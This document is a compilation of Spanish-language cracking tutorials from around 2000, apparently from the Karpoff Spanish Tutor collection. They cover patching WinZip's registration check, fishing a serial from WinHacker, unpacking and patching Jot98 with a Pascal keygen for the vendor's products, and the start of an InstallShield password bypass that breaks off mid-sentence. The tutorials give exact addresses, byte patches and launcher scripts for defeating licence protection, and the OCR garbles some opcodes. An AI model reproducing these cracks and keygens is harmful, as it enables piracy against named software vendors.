
| INTRODUCCION | 


Hola a todos, hoy he querido hacer un tutorial sobre un programa que todo el mundo 
tenemos instalado en nuestro ordenador, y del cual aun no he visto ningun tutorial en 
español sobre el y si lo hay espero que este sea un buen complemento. 


Antes de empezar mencionaré que se debe tener ya algun conocimiento sobre las 
herramientas que vamos a utilizar. 


| AL ATAKE 


El primer paso es por supuesto instalar el programa y hacer una copia del ejecutable en 
¡este caso Winzip32.exe. Inmediatamente veremos como funciona este programa, 
abrimos el winzip en el escritorio tienes que tener algun acceso directo, si no vete a la 
¡barra de inicio de windows Lo primero que hace es abrirnos una ventana en la que pone 
¡algo asi como. Esta es una version completa solo para evaluacion. La version registrada 
no enseña esta ventana. Si miramos la licencia, nos dice que tenemos 21 dias para 

probarlo pero he de decir que yo lo he tenido mucho tiempo instalado y la unica 
'limitacion que he encontrado es la molesta ventana que se abre al principio. 
'Observemos un poco esta ventana con 5 botones, el de licencia, de registrarse, de 
'¡ Informacion, de salir y el de aceptar, si nos fijamos en estos dos ultimos, veremos que 
¡cada vez que abrimos el winzip, igual aparece el boton de 1 agree en donde estaba el de 
quit o al reves, que mareo. ¿cuales habran sido los tenebrosos pensamientos del 
'|programador?, que no se nos haga automatico el pinchar sobre 1 agree sin mirar la 

pantalla, o sera un sistema de proteccion, si es por la segunda opcion a conseguido con 
¡ello irritarnos teniendo que buscar el dichoso boton cada vez. 


¡Bueno como primera idea, miraremos si nos da algun mensaje de error al intentar 

registrarme, pincho sobre el boton Enter registration code. y se abre otra ventana 
'pidiendonos el nombre y la clave de registro, antes de poner nada un consejo meter algo 
¡facil de ver rapido, no es lo mismo meter 1234567890 que meter ufkkImhbh, veis la 
diferencia, ni meter 555535535, por que si estamos en la rutina de comprobacion no 

sabremos si esta comparando el primer numero, o el cuarto. Dicho esto metamosle 
¡algun nombre y clave de registro y le damos a OK, nos enseña un mensaje de error 
'Incomplete or incorrect information. 


Por aqui empezaremos cerramos Winzip, abrimos el W32dasm y cargamos el ejecutable 
Winzip32.exe, busquemos en string refs el mensaje de error, cuando lo encontramos 
'¡pinchamos varias veces con el raton sobre el para ver cuantas referencias hay sobre el, 
| vemos que hay dos yo me he decantado por la primera por que si miramos el codigo 
¡hacia arriba hay dos referencias una a Name y otra a Sn , esto me suena de la ventana de 
registro. 


¡* Reference To: USER32.GetDlgltemTextA, Ord:00F5h 


':00408036 FF150C844600 Call dword ptr [0046840C] 
':0040803C 56 push esi 

:0040803D E800160200 call 00429642 

:00408042 59 pop ecx 

:00408043 56 push esi 


:00408044 E822160200 call 0042966B 

:00408049 803D18D9470000 cmp byte ptr [0047D918], 00-compara el nombre-- 
:00408050 59 pop ecx 

:00408051 745F je 004080B2--Salta al mensaje de error si en nombre no introduces nada-- 
:00408053 803D48D9470000 cmp byte ptr [0047D948], 00--compara registration-- 
:0040805A 7456 je 004080B2--Salta al error si en registration no introducimos nada-- 
:0040805C ESEAFAFFFEF call 00407B4B-Llamada a las rutinas de comprobacion-- 
:00408061 85CO0 test eax, eax--Comprueba el valor devuelto-------- 

:00408063 744D je 004080B2---Salta si no introducimos el codigo correcto--- 

:00408065 53 push ebx 


* Possible StringData Ref from Data Obj ->"WinZip" 


:00408066 BBA80C4700 mov ebx, 00470CAS8 


* Possible StringData Ref from Data Obj ->"Name" 
| 

:0040806B 68F8EA4600 push 0046EAF8 
:00408070 53 push ebx 

:00408071 E877A70200 call 004327ED 

:00408076 83C40C add esp, 0000000C 

:00408079 56 push esi 


* Possible StringData Ref from Data Obj ->"SN" 


:0040807A 6894F44600 push 0046F494 
:0040807F 53 push ebx 

:00408080 E868A70200 call 004327ED 
:00408085 83C40C add esp, 0000000C 


* Possible StringData Ref from Data Obj ->"winzip32.in1" 
| 

:00408088 68C80C4700 push 00470CC8 

:0040808D 6A00 push 00000000 

:0040808F 6A00 push 00000000 


* Possible StringData Ref from Data Obj ->"rrs" 


:00408091 6804EB4600 push 0046EB04 

:00408096 E839A70200 call 004327D4 

:0040809B A190944700 mov eax, dword ptr [00479490] 
:004080A0 83C410 add esp, 00000010 

:004080A3 85C0 test eax, eax 

:004080A5 7407 je 0O04080AE 

:004080A7 50 push eax 


* Reference To: GDI32.DeleteObject, Ord:0046h 


| 
:004080A8 FF1560804600 Call dword ptr [00468060] 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 


| |:00407FC9(U), :004080A5(C) 


| 
:004080AE 6A01 push 00000001 


:004080B0 EB31 ¡mp 004080E3 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
1:00408051(C), :0040805A(C), :00408063(C)-saltos que vienen a esta rutina--- 


:004080B2 E8E5010000 call 0040829C 


* Possible Reference to String Resource ID=00654: "Incomplete or incorrect information" 


| 
:004080B7 688E020000 push 0000028E--estamos aqui-- 


:004080BC E844050200 call 00428605 
:004080C1 59 pop ecx 

:004080C2 50 push eax 

:004080C3 57 push edi 

:004080C4 6A3D push 0000003D 
:004080C6 E8C5E60100 call 00426790 


Empecemos por esta parte de codigo, estamos en la direccion 004080B7 y por encima 
hay un aviso de tres saltos condicionales o incondicionales que hacen referencia a esta 
parte de codigo, como estan cerca de aquí las buscaremos desplazandonos hacia arriba 
con el raton. 


Ya tenemos que estar encima de estos saltos, los tres estan uno encima de otro ¿pero 
que hacen cada uno de estos saltos?, ¿cual tendre que cambiar para que no salte?, la 
gente que sepa de ensamblador lo sabra pero yo no tengo ni idea, cogamos el numero de 
la direccion de cada salto y el offset de cada uno por si nos hace falta: 


Code data Offset 
00408051 7451 
0040805A 745A 
00408063 7463 


Cerramos el Win32dasm y abrimos el loader de sice, cargamos el winzip, le damos al 
boton de load, al mensaje de error que sale le decimos que si y salta el sice, acto seguido 
ponemos tres breakpoints en las direccion que hemos cogido bpx 00408051, bpx 
0040805A, bpx 00408063 pulsamos FS, se abre la primera ventana de winzip, 
pinchamos en Enter Registration code y rellenamos lo que nos pide Name y 
Registration pulsamos Ok y salta el sice en el primer Bpx, o sea en el primer salto, el 
sice mismo nos indica que no saltamos, este no es el que buscamos otra vez F3 y 
paramos en el segundo Bpx, el sice tambien nos indica que no saltamos, otra vez ES y 
ya estamos en tercer Bpx 00408063 el sice nos indica que este si que salta, este sera 
¡nuestro salto. Pero que hacen los otros saltos anteriores, su mision es saltar al mensaje 


de error cuando no ponemos nada en Name o Registration. A continuacion normalmente 

| cerrariamos todo y como ya tenemos el offset, fijate en la tabla de mas arriba iriamos al 
editor hexadecimal para cambiar este salto, pero nos ahorraremos ese trabajo, vamos a 
cambiarlo en el sice ponemos d eip y con el cursor pinchamos sobre el primer byte de la 

¡ventana de datos del sice que sera 74 lo cambiamos por 73 y le damos a enter, pulsamos 

| FS y nos aparece una ventana en el winzip pidiendonos que confirmemos, si hemos 
entrado bien el nombre y la clave de registro le damos a Ok y empieza a funcionar el 

| winzip, antes de lanzar las campanas al vuelo comprobemos si todo funciona bien, 

| cerramos winzip y el loader del sice pero ojo muy importante no hay que quitar los bpx 

| que teniamos, ejecutemos el winzip y aparece la ventana de marras, no hemos 

| conseguido registrar el programa, ademas no pasa por nuestros bpx eso quiere decir que 

¡vaa las rutinas de comprobacion desde otras llamadas, cierra el winzip y quita los bpx 

¡del sice bc *, como hemos hecho antes abramos w32dasm y carguemos winzip32.exe, 

| quiero localizar desde donde se llama a esas rutinas, y ¿como hacerlo?, ya conozco una 

| llamada a esas rutinas esta encima del que creia que era nuestro salto asi que vamos a 

¡ese salto. pinchamos en goto code location y metemos nuestro salto 00408063 

| aparecemos en esta parte de codigo 

| 


| 00408049 803D18D9470000 cmp byte ptr [0047D918], 00-compara el nombre-- 

| :00408050 59 pop ecx 

1 :00408051 745F je 004080B2--Salta al mensaje de error si en nombre no introduces nada-- 
| :00408053 803D48D9470000 cmp byte ptr [0047D948], 00--compara registration-- 
| :0040805A 7456 je 004080B2--Salta al error si en registration no introducimos nada-- 
| :0040805C ESEAFAFFFEF call 00407B4B-Llamada a las rutinas de comprobacion-- 
:00408061 85CO0 test eax, eax--Comprueba el valor devuelto-------- 


1 :00408063 744D je 004080B2---aparecemos aqui--- 


¡Dos lineas de codigo mas arriba hay una llamada a las rutinas de comprobacion, nos 
situamos sobre ella y pulsamos el boton de call en el w32dasm y nos llevara: 


|* Referenced by a CALL at Addresses: 
1 |:0040108C , :00401228 , :0040805C , :0042D095 


| :00407B4B 55 push ebp 

| :00407B4C 8BEC mov ebp, esp 

| :00407B4E 81EC08020000 sub esp, 00000208 
:00407B54 53 push ebx 


Lo que nos interesa de aqui es el Referenced by a CALL etc. hay cuatro llamadas a esta 
| rutina y por supuesto esta la que nosotros venimos, apuntamos las cuatro llamadas 
| :0040108C , :00401228 , :0040805C , :0042D095 cerramos el w32dasm, otra vez 
| cargamos el winzip con el loader del sice y cuando salte el sice le metemos estas 
¡direcciones como breakpoints pulsamos FS y salta el primer bpx en 00401228: 


:00401228 call 00407B4B---llama a las rutinas de comparacion---- 
:0040122D test eax, eax 
:0040122F jne 004011A8 --Salta si estamos registrados------- 


Pulsamos F10 dos veces y nos quedamos en la linea 0040122f en la cual hay un salto 
cambiemoslo a ver que pasa, en el sice ponemos d eip y en la ventana de datos nos 
situamos sobre el segundo byte que es un 85 y lo cambiamos por un 84, pulsamos enter 
y ES el winzip comienza a funcionar sin mostrarnos la ventana del principio, cerramos 
el programa y comprobamos que no salta ningun breakpoint mas, el programa queda 
totalmente funcional. El siguiente paso seria buscar el offset en el w32dasm y con el 
editor hexadecimal cambiar el salto. Al final del tutorial hay una explicacion de como 
hacer esto. 


En esta 2* opcion veremos que el programa aun damas de si, vamos a revisar las rutinas 
que generan la clave de registro y comparan las claves. 


Fijaros en las tres lineas de codigo que hay mas arriba concretamente sobre esta 
00401228 call 00407B4B---llama a las rutinas de comparacion----, como ya sabemos cual es la 
linea de codigo donde estan esas rutinas, abramos el loader del sice y carguemos el 
wInzip como estamos haciendo durante todo el tutorial, cuando salte por primera vez el 
sice metemos este bpx 00407B4B y le damos a ES, el programa salta en el breakpoint 
que acabamos de poner y vamos pulsando F10 hasta que estemos sobre la linea de 
codigo 00407C2A y nos paramos 


:00407C0E lea eax,[ebp-0140] 

:00407C14 push eax 

:00407C15 push edi 

:00407C16 call 00407CC6--Genera la clave de registro-- 
:00407C1B pop ecx 

:00407C1C mov esi, 0047D948--Carga nuestra clave en esi--- 
:00407C21 pop ecx 

:00407C22 lea eax, [ebp-0140]--carga la clave generada en eax-- 
:00407C28 push esi 

:00407C29 push eax 

:00407C2A call 004578A0--Compara las claves---- 
:00407C2F neg eax 

:00407C31 sbb eax, eax 


Miremos la parte de codigo que tenemos arriba, si entrasemos en la llamada que hay en 
la linea de codigo 00407c16, veriamos paso a paso como se genera la clave de registro, 
si quieres hacer un generador de claves de este programa esta es la llamada, 
continuamos hacia abajo y en la linea 00407C1C mov esi, 0047D948 esto quiere decir 
mueve 0047D948 a esi, si ponemos en el sice d 0047d948 veremos en la ventana de 

| datos que está nuestra clave, o sea que esta instruccion carga nuestra clave a esi, 


| continuamos mas abajo y en la linea de codigo 00407C22 lea eax, [ebp-0140], esta 
instruccion carga en eax el contenido de ebp-0140 si ponemos en el sice d ebp-0140 en 
la ventana de datos nos sale la clave generada por el ordenador a partir de nuestro 
nombre, o sea la correcta. Continuamos hacia abajo hasta la linea 00407C2A call 
004578A0 si entrasemos en esta llamada veriamos como se comparan las dos claves. 


¡| Mira un poco el codigo de arriba a ver que se te ocurre que podamos hacer. 


¡Esto es lo que se me ocurre a mi, en la llamada 00407C2A, podriamos estudiar que 

| valor tendria que tener el registro eax despues de retornar de esa llamada, y meterle 
¡directamente ese valor para que piense que es correcta nuestra clave, la solucion seria 
| sustirtuir el call 004578A0 por mov eax,0 yo lo probe y el programa funciona 

| perfectamente. 

| 
| Pero lo aremos de otra forma, antes de llegar a esta llamada, ya hemos visto donde se 
| carga nuestra clave en esi, y donde se carga la clave generada en eax, mi idea es 

| cambiar alguna de estas dos lineas de codigo para que se cargue en eax y en esi la 
¡misma clave y asi al compararlas como serian iguales todo iria bien. ¿Cual cambiar? si 

| cambio 00407C1C mov esi, 0047D948 por 00407C1C mov esi,[ebp-0140] no me cabe 

| y se destroza todo el codigo de abajo, por el contrario si cambio 00407C22 lea eax, [ebp- 
| 0140] por 00407C22 lea eax,[0047D948] si que me cabe, ahora eax y esi contienen la 
¡clave que yo he introducido y por lo tanto son iguales, de esta manera el programa 

| ademas de funcionar perfectamente, si miramos en el about del winzip estamos hasta 

| registrados con nuestro nombre y clave. 


| 
| ¿Y si rizamos el rizo aun mas?, fijaos en la linea 00407C0E lea eax,[ebp-0140] ojo que 


¡no es la misma que la anterior aunque contenga el mismo codigo. Esta linea carga en 
| eax una direccion de memoria en la cual el programa almacenara la clave buena despues 
| de generarla. ¿Y que podemos hacer aqui?, lo mismo que antes si cambiamos 

1 00407C0E lea eax,[ebp-0140] por 00407C0E lea eax,[0047D948] (recordemos que 
100474948 lleva almacenada nuestra clave), entonces el programa almacenara la clave 
| generada en 0047D948. Este cambio comporta que cuando lleguemos a la llamada de 
| comparacion, compara la clave buena con la clave buena. 

| 

| Y tu diras el porque de hacer los dos cambios si con el primero ya basta, por lo 
|siguiente, al registrarnos nos muestra la siguiente ventana donde nos dice algo asi, 

| comprueba si has metido bien el nombre y la clave, aqui nos enseñara el nombre que 
| hemos metido mas la clave buena no la clave que habiamos metido, espero que lo 

¡| entendais. En esta ventana si en vez de pulsar Ok le damos a Retry y metemos otro 
¡nombre nos dara la clave buena de ese nombre, hemos conseguido una especie de 

| generador de claves. 


¡Vamos a hacer los cambios necesarios para que se de este evento, abre el loader del sice 


carga el winzip dale a load y cuando salte el sice pon un bpx 00407C0E, dale a FS y 


¡saltaras al breakpoint, fijate en los bytes que hay entre 00407C0E y 00407C14 (407C14- 


407C0E) son 6 bytes, ponemos en sice d 00407C0E y apuntamos los 6 primeros bytes 
de la ventana de datos del sice, ahora ponemos a y enter saldra esto 015f :00407C0E 
pon lea eax,[0047D948] y pulsa dos veces enter, ahora apunta los 6 primeros bytes de la 
ventana de datos tendras esto: antes 

015f :00407C0E 8D 85 CO FE FF FF 

despues del cambio 

015f :00407C0E 8D 05 48 D9 47 00 

Recuerda que la linea 00407C22 tambien la tenemos que cambiar pero como el cambio 
es el mismo no hace falta repetir la opiracion solo cambia la linea de codigo: 

antes 

015f :00407C22 8D 85 CO FE FF FF 

despues del cambio 

015f :00407C22 8D 05 48 D9 47 00 

quitamos el breakpoint bc * y cerramos todo abrimos el w32dasm cargamos el 
winzip32.exe y en goto code location buscamos 00407C0E miramos debajo el offset 
que tiene y repetimos la operacion con 00407C22 quedara asi 


Code data offset 
00407C0E 700E 
00407C22 7022 


Cerramos w32dasm y habrimos algun editor hexadecimal buscamos los offsets y 
realizamos los cambios necesarios. Ya tenemos el programa totalmente funcional y 
debidamente registrados con la clave correcta y todo. 


Hasta aqui todo, creo que ya me extendido bastante, y tu me diras ¡es que joder como te 
enrrollas!, ya pero yo creo que sí se quiere aprender lo mejor es estudiar perfectamente 
los programas y no hacernos el chulo diciendo yo lo crackee en 2 minutos. 


Un saludo a toda la peña y hasta otra. 
Por fanega 


fanegal O airtel.net 
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Programa: WinHacker v2.03 


PROTECCION: Limitado a 20 dias 


Descripcion: Toquitear las entrañas de Windows 
Dificultad: RR 
DOWNLOAD: http://www.winhacker.com/ 


Herramientas: Softice v3x< 
CRACKER: KuaTo_ThoR FECHA: 23/06/2000 


INTRODUCCION 


Al parecer este programa sirve para adentrarse en lo más profundo de windows, la verdad es que no lo sé 
porque no he tenido tiempo de probarlo. Además he visto tutoriales para este programa (otras versiones) de 
como crakearlo, y me decidí a probar si conseguía el serial (que siempre es más fisno), y así probar mis 
escasos conocimientos del tema. Me sorprendió la facilidad con la que lo conseguí, así que os animo a que lo 
intentéis antes de leer lo que viene a continuación. 


AL ATAKE 


Bueno vamos allá. 


Lo primero es ejecutar el programa, nos aparece un bonito nag recordandonos que sólo tenemos 20 dias de prueba, y 
ya nos aparece la ventana de registro, que considerado, no tenemos ni que entrar en el programa. 


Bien rellenamos cada hueco con los datos que queramos, por ejemplo: 
Name: Chiquito > Company: Bonanza ; Serial Num: 444666888. 


Antes de dar a Register, vamos a Softcie (Ctrl+D) y ponemos un bonito breakpoint, en este caso bpx getwindowtexta, 
¿por qué? bueno, tendrá que leer los datos verdad? Volvamos a windows (FS) pulsamos Register y plash... de vuelta a 
softice, como hemos rellenado tres campos, tendrá que leer los otros dos asi que pulsamos un par de veces ES. Ahora 


ya ha leido todos nuestros datos, pero aún no estamos en WinHacker, estamos en User32!, pues bien pulsamos F12 (yo 
un par de veces) hasta que estemos en wh95!, ahora sí, ya podemos quitar el breakpoint (bc0). 


Ahora estamos en el WinHacker, veamos si encontramos nuestro código, ponemos d eax, y nada, ponemos d ecx y 
¡¡Bingo!! hay nos aparece nuestro flamante 444666888, qué podemos hacer con esto, pués por ejemplo si ponemos 
?ecx, nos aparece 6D46BO0 y un rollete, esto es algo así a la dirección donde se encuentra nuestro código chungo (si no 
es así espero a que alguien me lo explique), lo ideal sería poder seguir a nuestro código hasta la comparación con el 
bueno, ¿se puede hacer?, por supuesto, si no no lo hubiese puesto, pongamos pués un breakpoint pero esta vez no un 
bpx si no un bpm 6D46B0 (break on memory access). Pulsamos ES para dejarlo correr y ¡¡Plash!! otra vez en softice, 
pero en el User32, luego pulsamos F12 hasta aparecer en Wh95 y nos saldra algo como esto: 


:7800328B 8B02 Mov eax, [edx] 
:7800328D 3A01 Cmp Al, ecx 
7800328F 7530 JNZ 780032C1 -------- Aquí aparecemos 


Escribimos d ecx, y efectivamente hay está nuestro código chungo, miramos en las proximidades haber si hay cosas 
interesantes y encontramos bastantes, comparaciones por aquí, operaciones por allá, parece que edx puede tener algo 
interesante, ponemos d edx y ¡¡sorpresa!! aparece algo como d6cb-5d2eec, tiene toda la pinta de ser un código. Nos 
salimos (FS), lo probamos y ... ESTAMOS REGISTRADOS. 


Esto es todo, pido perdón por los errores que haya cometido y espero que os haya servido de ayuda. 


P.D.: Cualquier duda, rectificación, lo que sea a: kuato_thor Ohotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la dibulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


Jot98 v1.02 y Más... 


Programa: 


PROTECCION: Limitacion de Usos. 


Descripcion: Block de Notas de lujo. 


Dificultad: Principiante +. 


DOWNLOAD : http: //www.spaeder.com 


Herramientas: Softice, W32dasm, Editor Hexa y un descompresor Shrink 


CRACKER: KuaTo_ThoR FECHA: 01/07/2000 


| INTRODUCCION 


Este programa como todos los de esta compañía (al menos los que yo he visto), tienen la misma protección, 
límite de uso de X veces, nag que nos lo recuerda de vez en cuando, archivos empaquetados, el código de 
validación va a un archivo, todo hecho de serie, grave error, así si cae uno caen todos como vamos a 
comprobar. 


La mayoría de utilidades a las que hago referencia están en la página de Karpoff, pero si no están aquí sí 
http://protools.exit.de/. 


AL ATAKE 


Vamos con el Jot98: 


Lo primero como siempr s ejecutar el programa, nos sale a recibir un nag avisandonos que 
podemos ejecutar el programa sólo 30 veces a no ser que soltemos 20$, damos ok y un bonito 
archivo de texto nos cuenta las maravillas del producto. Bien a lo que vamos, miramos en la 
ayuda, y leemos la información de registro, para ver si existe alguna limitación más, lo leemos 
y nada, sólo los 30 usos. Ahora ya podemos empezar. Vamos donde se mete la clave de registro, 
metemos lo que queramos y nos aparece Invalid Registration code. 


1 Desempaquetado: 


Como no tengo el Softice cargado, vamos con Wdasm, primero hacemos una copia de nuestro archivo 
'víctima' , y nos decidimos a abrir este último tan contentos, le damos y... mensaje de error 
Esto nos huele a empaquetado, damos a aceptar, y ya podemos ver de que empaquetador se trata, el 
Shrink. Pero qué versión, un truco para verlo sin el famoso GetTyp, es con el editor hexa (yo 
uso el AXE), no se si funciona con todos los empaquetadores, pero no perdemos nada con probar. 
Ahí va, abrimos nuestro archivo con el editor hexa, vamos a las últimas líneas del código y ahí 
está, Shrink 34 no hay más que decir. 


Podemos hacer dos cosas, desempaquetarlo o utilizar el Softice. 


Vamos a desempaquetarlo, con las herramientas adecuadas se hace sólo, concretamente yo he 
utilizado un desempaquetador específico de Shrink 34, se lama DeShrink (v1.6) de un tal j0b 
(desde aquí le agradezco su trabajo). Si utilizáis este progama, no tenéis más que meter el 
archivo a desempaquetar (Jot98.exe), poner el nombre del archivo de salida (p.e. jot98_un), y 
darle a decompress. Ya está desempaquetado, podemos ver que el tamaño del nuevo archivo es 
mayor, y podemos probar a ejecutarlo y todo funciona corrctamente. 


2% Parcheado 


Ahora podemos abrir nuestro nuevo ejecutable con Wdasm buscamos la frasecita de error en String 
References, y ahi está, pulsamos dos veces sobre ella y nos lleva a donde queremos (no está 
demás pulsar otra vez para ver si el mismo mensaje aparece más de una vez). Efectivamente, 
aparecen dos lugares, el segundo es: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0045458A(C) 

:004547DC 6A00 push 00000000 

:004547DE 668B0DBC484500 mov Cx, word ptr [004548BC] 

:004547E5 33D2 xor edx, edx 


* Possible StringData Ref from Code Obj ->"Invalid registration code." 


:004547E7 A1B4974500 mov eax, dword ptr [004597B4] 
:004547EC E8C76BFEFF call 0043B3B8 


Vamos a 0045458A, y nos aparece una estructura que nos debe resultar bastante conocida, jeje: 


:0045457A E899F8FAFF call 00403E18 

:0045457F 8B45CC mov eax, dword ptr [ebp-34] <--- Prepara eax 
:00454582 8B55E4 mov edx, dword ptr [ebp-1C] <--- Prepara edx 
:00454585 ES9AFJFAFF call 00403D24 <--- Compara edx y eax 


:0045458A 0F854C020000 jne 004547DC <--=-= Vamos a Invalid Code  :( 
:00454590 8B153CA84500 mov edx, dword ptr [0045A83C] 

:00454596 8BC6 mov eax, esi 

:00454598 E83F0C0000 call 004551DC 


Apuntamos 00454585 en un papelito para luego ;-). Desde luego este salto no nos interesa nada, 
por tanto decidimos, por ejemplo, nopearlo. Nos vamos a apuntar el Offset 0005458A y también los 
bytes 0F854c020000. ¿Y qué pasa con el otro mensaje de Invalid Code? pues ahí va: 


:0045447B 8B45CC mov eax, dword ptr [ebp-34] 
:0045447E ES91F7FAFF call 00403C14 


:00454483 83F80F cmp eax, 0000000F <--- Compara eax con 15 

:00454486 7TElA jle 004544A2 <--=-=-= Este salto nos interesa hacerlo 
:00454488 6A00 push 00000000 

:0045448A 668B0DBC484500 mov CxX, word ptr [004548BC] 

:00454491 33D2 xor edx, edx 


* Possible StringData Ref from Code Obj ->"Invalid registration code." 
:00454493 A1B4974500 mov eax, dword ptr [004597B4] 

:00454498 ES1B6FFEFF call 0043B3B8 

:0045449D E94F030000 jmp 004547F1 


Como podemos ver hay un salto (salta si es menor o igual) un poco antes de llegar al mensaje de 
error, desde luego nos interesa hacerlo. Veamos que hay antes del salto, se compara eax con 15, 
no hace falta tener mucha imaginación para pensar que se está comparando el tamaño de nuestro 
código (o nombre), si estuviesemos en el Softice, con poner d eax lo sabríamos. Por tanto con 
meter un código de longitud inferior a 15 ya nos habríamos librado de este mensaje de error. 


Ahora tenemos dos opciones modificar con el editor hexa el archivo jot98_un o utilizar un 
launcher para parchear en memoria el archivo original, como no tengo nada mejor que hacer voy ha 
hacerlo de las dos maneras. Pero lo primero vamos al direcctorio donde tenemos el programa 
instalado y hacemos una copia del archivo jot98.val 


Modificar con el editor hexa: 


Abrimos el archivo (recordad el jot98_un) en el editor hexa, buscamos el Offset 5458A y le 
metemos 909090909090. Lo guardamos y a probar. Ejecutamos, le metemos los datos y 
¡¡Congratulations!!, reiniciamos el programa y seguimos registrados, ya está. 


Si comparamos el archivo jot98.val actual con la copia que hemos hecho antes podemos comprobar 
que se han modificado unos numeritos, y si ponemos el archivo que hemos guardado antes en lugar 
del nuevo, volveremos a no registrado. Antes de volver a no registrado, hacemos una copia del 
archivo actual, por ejemplo le llamamos jot98regl.val. 


Con R!SC's Process Patcher v1.5 


Podéis utilizar el que queráis, yo voy a utilizar el R!SC's Process Patcher v1.5 . Abrimos un 
editor de texto, y siguiendo la ayuda, que para eso está, escribimos lo siguiente: 


¿jot98.rpp <--- Nombre del archivo que vamos ha crear en el editor de texto 
O=j098.exe: ¡; <-- El launcher que va a crear el R!SC's 

F=jot98.exe: ¡; <-- Nuestro objetivo 
P=45458A/0F,85,4c,02,00,00/90,90,90,90,90,90: ; <-- Lo que cambiamos 

S 5 


Lo guardamos como jot98.rpp, ejecutamos el R!SC's, seleccionamos jot98.rpp damos a abrir y ya 
tenemos nuestro launcher (jo98.exe). Lo copiamos, lo llevamos a la carpeta del jot98, lo 
ejecutamos metemos los datos que queramos (recomiendo distintos de los anteriores) y ya está. 


3” Una curiosidad: 


Aunque esto ya está terminado, vamos a ver una curiosidad: 


si comparamos el archivo jot98.val actual con las copias que hemos hecho antes podemos comprobar 
lo siguiente: 


- Archivo original: Spaeder5323223415601010812278 


- Parece que se modifican estos números, que tendrán que ver con nuestro código :-o Además las 
dos 'secuencias' válidas empiezan por Spaeder25. Si alguien lo traduce que me lo diga. 


4% Una de serial: 


Con todo lo que hemos hecho antes está 'chupao'. Si no tenemos Cargado el Softice, 
reiniciamos..... 


Ejecutamos el programa metemos el nmbre (KuaTo_ThoR), el código (999888777) y antes de darle 
vamos al Sofice (Ctrl1+D), y como no tengo ganas de equivocarme meto un bpx hmemcpy (conviene 
tener cerrados todos los programas, sino va a saltar por cualquier cosa.) volvemos a Windows, le 
damos a ok y a Sofice. 


Aparecemos en User (línea verde), lo primero quitamos el break (bc0), luego pulsamos F12 hasta 
aparecer en JOT98!.shrink. Como ya sabemos donde tenemos que ir (ver principio apartado 2%), 
escribimos bpx 454585, damos Ctrl1+D y aparecemos en Softice, escribimos d eax y sale nuestro 
código, escribimos d edx y sale JT98R7604K. Damos F5, metemos los datos correctos y ya está. 


He repetido esto varias veces y he sacado las siguientes conclusiones: 


- El código es de tamaño 10 


- JT98 es fijo. 


- La Ultima letra (K) es la inicial de nuestro nombre en mayusculas y el 4 anterior es fijo. 


- El 76 también es fijo. 


- La antepenúltima cifra (0) es la longitud de nuestro nombre (si es de diez o más 0). 


- La Res la última letra de nuestro nombre (en mayúsculas). 


Con esto el generador está servido Jeje. Ahí va un pequeño programilla en Pascal: 


program keygen; 

uses crt; 

var 

a,b,c: char; 

cont: integer; 

begin 

clrscr; 

Writeln('Generador de claves para JOT98 por KuaTo_ThoR'); 
writeln; 

Write('Dame tu nombre: '); 
read (a); 

cont:=1; 

repeat 

read (b); 

cont :=cont+1; 

until eoln; 

if cont>=10 then cont:=0; 
a:=Upcase (a); 

b:=Upcase (b); 

writeln('Tu cédigo es: JT98',a,'76',cont,'4',b); 
readln; 

readln; 

end. 


Vaya, sin seguir una sóla línea de código, tenemos un Generador. Lo que no me explico, es que 
siendo el número de serie tan simple en el archivo JOT98.val cambie tantos números. 


5% Conclusiones finales: 


Bueno lo que me pregunto es si los demás programas de esta compañía están protegidos de igual 
manera. Yo he probado con el TrayCal vl1.02 y está protegido igual excepto el archivo val que no 
lo tiene. Pero para el nombre 'felipito', el código es TCO7684F, la misma codificación que antes 
salvo que en lugar de JT98 aparece TC, sólo varían las iniciales del programa, que poca 
imaginación. Y pillé otro más, el TrayInfo v1.02, que para 'felipito' tiene el siguiente código: 
TI3207684F. (Estas versiones 1.02 han salido todas a granel de la factoría). Con esta 


información podemos hacer un generador de claves para la compañía jeje, pero eso ya os lo dejo a 
vosotros. 


Esto ha sido todo, perdón por los errores que haya cometido y espero que os haya servido de 
ayuda. 


Saludos y hasta la próxima.... 


P.D.: Cualquier duda, pregunta, rectificación, lo que sea a: kuato _thorfhotmail.com 
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1” Psxcopy 6.2 


INTRODUCCION 


Ante todo decir que para seguir este tutorial ya se debe tener conocimiento del uso de las herramientas que arriba se 


Hoy vamos a ver dos tecnicas de proteccion que suelen usar bastantes programas durante el proceso de instalacion. La 
primera es el mismo instalador quien nos pide un password para continuar la instalacion en este caso es el InstallShield. 
La segunda es el programa que intentamos instalar quien nos pide el nombre, compañia y numero de serie. 


En los dos casos si no sabemos la contraseña o el numero de serie, no nos deja instalar el programa y ni siquiera nos deja 


Como programas para ver como instalar programas sin saber el numero de serie utilizaremos estos dos: 


2” Numega Softice 4.05 


| AL ATAKE 


Pxscopy 6.2 


Este es un programa de grabacion cuya utilidad es duplicar cds, hasta aqui llego no voy a alabar ni mucho menos las 
cualidades de este programa, simplemente porque esta gente es la que da mal nombre a los reversers, estos si que son 
CKACKERS de verdad, y digo todo esto por que se trata de una copia pirata de NTI CD COPY. Esta gente a cogido el 
programa y han cambiado todos los caption o sea los nombres de todas las ventanas, donde ponia Nti cd copy lo han 
cambiado por Pxscopy 6.2, pero todavia existen algunos errores. En la ayuda en algunas explicaciones todavia se ven 
algunas ventanas con Nti cd copy, y si habrimos con algun editor hexadecimal la imagen que crea el programa en el disco 
duro al grabar algun disco vemos claramente la palabra NTI al principio de la imagen, y todavia mas encima de crackearlo 
y ponerlo en la red, quieren que paguemos por el ¡que morro!. 


Vamos por faena, esta programa cuando intentamos instalarlo, antes de descomprimirse en el archivo temporal de 
windows nos pide una contraseña. 


InstallShield Self-extracting Exe 


attached files. 


A — 


al Please enter the password required to extract the 


Metemos una contraseña facil de recordar por ejemplo:123456, le damos a ok y nos muestra un mensaje de error. 


InstallShield Self-extracting EXE 


You have entered an incorrect password, 


Si le damos a aceptar el programa se cierra por completo. Vamos a intentar pasar esto como no sabemos la contraseña 
utilizaremos nuestras armas. Arrancamos otra vez el programa y en la ventana anterior a la que nos pide el password 
pulsamos ctrl+d y entramos en el sice ahora tenemos que meter algun breakpoint para que salte el sice antes de enseñarnos 
